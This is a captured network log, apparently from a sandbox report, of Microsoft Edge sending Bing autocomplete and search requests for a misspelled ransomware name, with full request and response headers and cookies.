set-cookie: SRCHUSR=DOB=20241017; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:40 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:40 GMT; path=/; secure; SameSite=None
set-cookie: _SS=SID=0188C35E2CB764F1179BD6452DCF6544; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199020.1490e8a8
GET

https://www.bing.com/qbox?query=one+a+cry+m&language=en-US&pt=EdgBox&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&ig=81e6d00de1044d26bdf3fa2b4a74365e&oit=4&cp=11&pgcl=4

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /qbox?query=one+a+cry+m&language=en-US&pt=EdgBox&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&ig=81e6d00de1044d26bdf3fa2b4a74365e&oit=4&cp=11&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 352
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: gzip
vary: Accept-Encoding
x-eventid: 67117bacd57b4eed8293be8b4843cbba
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-zwv1cyn3iWNXisp60N36ITtMgYEi21mHHLf3D+uVMtM='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 17 Oct 2024 21:03:40 GMT
set-cookie: MUID=0CE74D92B4AA66831B1A5889B5196791; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:40 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=0CE74D92B4AA66831B1A5889B5196791; expires=Tue, 11-Nov-2025 21:03:40 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=268440B704FE6FF5268855AC054D6E0D; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:40 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:40 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:40 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=77D9E3A911454C00AFE772F42FDEBC2A&dmnchg=1; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:40 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20241017; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:40 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:40 GMT; path=/; secure; SameSite=None
set-cookie: _SS=SID=268440B704FE6FF5268855AC054D6E0D; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199020.1490e9bb
GET

https://www.bing.com/qbox?query=one+a+cry+ma&language=en-US&pt=EdgBox&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&ig=6cc8bea2816e4e1cbfa06727948b2cfe&oit=4&cp=12&pgcl=4

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /qbox?query=one+a+cry+ma&language=en-US&pt=EdgBox&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&ig=6cc8bea2816e4e1cbfa06727948b2cfe&oit=4&cp=12&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 189
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: gzip
vary: Accept-Encoding
x-eventid: 67117baed8e744158190184ee27c79b1
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-3dDx6nsIShnn25JEO9oAlpcCbD0M3cyKb0FoTvC/lbI='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 17 Oct 2024 21:03:42 GMT
set-cookie: MUID=06240633728062BE39951328731C638D; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:42 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=06240633728062BE39951328731C638D; expires=Tue, 11-Nov-2025 21:03:42 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=1702A08D398569EC28C6B596381968C6; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:42 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:42 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:42 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=42C4C6D5B15A42E4B45D34E332FF55CB&dmnchg=1; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:42 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20241017; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:42 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:42 GMT; path=/; secure; SameSite=None
set-cookie: _SS=SID=1702A08D398569EC28C6B596381968C6; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199022.1490f13f
GET

https://www.bing.com/qbox?query=one+a+cry+mal&language=en-US&pt=EdgBox&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&ig=4a81c90cca7b41d78b0a76e9655628f0&oit=4&cp=13&pgcl=4

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /qbox?query=one+a+cry+mal&language=en-US&pt=EdgBox&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&ig=4a81c90cca7b41d78b0a76e9655628f0&oit=4&cp=13&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 140
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: gzip
vary: Accept-Encoding
x-eventid: 67117baee641422ea68964f6d7b2f246
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-LBZigjmtZuJ2ERp6sLrh0C9vZZiRGs+RpfRwFuqTLc0='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 17 Oct 2024 21:03:42 GMT
set-cookie: MUID=329AE29F1A666E84253BF7841BDA6FE1; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:42 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=329AE29F1A666E84253BF7841BDA6FE1; expires=Tue, 11-Nov-2025 21:03:42 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=2177BA142D996AB80036AF0F2C256B26; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:42 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:42 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:42 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=038004EBF7DD45B9BF159882FF9ADBE4&dmnchg=1; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:42 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20241017; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:42 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:42 GMT; path=/; secure; SameSite=None
set-cookie: _SS=SID=2177BA142D996AB80036AF0F2C256B26; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199022.1490f319
GET

https://www.bing.com/qbox?query=one+a+cry+mala&language=en-US&pt=EdgBox&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&ig=26e8c446078e47f5bae62713e5c1c9a7&oit=4&cp=14&pgcl=4

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /qbox?query=one+a+cry+mala&language=en-US&pt=EdgBox&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&ig=26e8c446078e47f5bae62713e5c1c9a7&oit=4&cp=14&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 141
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: gzip
vary: Accept-Encoding
x-eventid: 67117baeabc845b984f2e433b793f6d8
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-nPEwk9dyPvQ9tBYt0o8JNv9g44E52B9N1A2a1q4I4E4='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 17 Oct 2024 21:03:42 GMT
set-cookie: MUID=0A57FF2F9FA363760D98EA349ED06253; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:42 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=0A57FF2F9FA363760D98EA349ED06253; expires=Tue, 11-Nov-2025 21:03:42 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=19A712E3526A645E03F207F853196519; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:42 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:42 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:42 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=2598EFBC6D25450282E0AF4C938494E7&dmnchg=1; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:42 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20241017; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:42 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:42 GMT; path=/; secure; SameSite=None
set-cookie: _SS=SID=19A712E3526A645E03F207F853196519; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199022.1490f4c9
GET

https://www.bing.com/qbox?query=one+a+cry+malaw&language=en-US&pt=EdgBox&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&ig=ce294716042c4dd8b26d0fe28a6471e6&oit=4&cp=15&pgcl=4

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /qbox?query=one+a+cry+malaw&language=en-US&pt=EdgBox&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&ig=ce294716042c4dd8b26d0fe28a6471e6&oit=4&cp=15&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 142
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: gzip
vary: Accept-Encoding
x-eventid: 67117bafcc7d4d8ca06ef2f688c1dc79
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-M5r6VPIh6rglBtnJdQ43qMBqsT8a2ynrBRbIRSWBmKE='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 17 Oct 2024 21:03:43 GMT
set-cookie: MUID=16A7C41786E66459102BD10C87A16595; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:43 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=16A7C41786E66459102BD10C87A16595; expires=Tue, 11-Nov-2025 21:03:43 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=04AB276689B76C2F2DA6327D88F06DE9; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:43 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:43 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:43 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=03AB5FB296214E8D85464DCC2D59CCB3&dmnchg=1; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:43 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20241017; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:43 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:43 GMT; path=/; secure; SameSite=None
set-cookie: _SS=SID=04AB276689B76C2F2DA6327D88F06DE9; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199023.1490f6ed
GET

https://www.bing.com/qbox?query=one+a+cry+malawa&language=en-US&pt=EdgBox&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&ig=22390f1b407248dfbf9495fef351af4f&oit=4&cp=16&pgcl=4

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /qbox?query=one+a+cry+malawa&language=en-US&pt=EdgBox&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&ig=22390f1b407248dfbf9495fef351af4f&oit=4&cp=16&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 142
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: gzip
vary: Accept-Encoding
x-eventid: 67117bb039264ad893f64f33b6313616
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-BdXRPSWB0Lwy/e6+rrEbzcU8ZN7MiSHwh8GwWSIBgjQ='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 17 Oct 2024 21:03:44 GMT
set-cookie: MUID=0BE29625800D635638F2833E81D16269; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:44 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=0BE29625800D635638F2833E81D16269; expires=Tue, 11-Nov-2025 21:03:44 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=11BD8F37EE836B350A699A2CEF5F6A97; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:44 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:44 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:44 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=FC20738E46A64ABBAE215F3538BA1A9D&dmnchg=1; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:44 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20241017; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:44 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:44 GMT; path=/; secure; SameSite=None
set-cookie: _SS=SID=11BD8F37EE836B350A699A2CEF5F6A97; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199024.1490fc64
GET

https://www.bing.com/qbox?query=one+a+cry+malawar&language=en-US&pt=EdgBox&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&ig=f2e1e6171c6a42e69cf751fe2eaa5274&oit=4&cp=17&pgcl=4

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /qbox?query=one+a+cry+malawar&language=en-US&pt=EdgBox&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&ig=f2e1e6171c6a42e69cf751fe2eaa5274&oit=4&cp=17&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-type: text/html; charset=utf-8
cache-control: private, max-age=0
content-encoding: br
expires: Thu, 17 Oct 2024 21:02:44 GMT
vary: Accept-Encoding
x-eventid: 67117bb001b14002a55ff298bb5ee315
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
strict-transport-security: max-age=31536000; includeSubDomains; preload
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-/ajt3XEAEMiuZb5CXYRGSw+mVi4JlRu1qzhG2aBirrM='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingserp&ndcParam=QWthbWFp"}]}
report-to: {"group":"crossorigin-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingserp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0,"include_subdomains":true}
cross-origin-embedder-policy-report-only: 'require-corp; report-to=\"crossorigin-errors\"'
cross-origin-opener-policy-report-only: 'same-origin; report-to=\"crossorigin-errors\"'
date: Thu, 17 Oct 2024 21:03:44 GMT
set-cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:44 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE; expires=Tue, 11-Nov-2025 21:03:44 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:44 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:44 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B; domain=.bing.com; path=/; secure; SameSite=None
set-cookie: SRCHS=PC=U531; domain=.bing.com; path=/; secure; SameSite=None
set-cookie: SRCHD=AF=ANAB01; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:44 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:44 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20241017; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:44 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:44 GMT; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199024.1490ff82
set-cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=; Domain=.bing.com; Path=/; Expires=Thu, 17 Oct 2024 23:03:44 GMT; Max-Age=7200
GET

https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
sec-ch-ua-mobile: ?0
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 15344
content-type: font/woff2
cache-control: public, max-age=15552000
last-modified: Mon, 01 Jan 1601 00:00:00 GMT
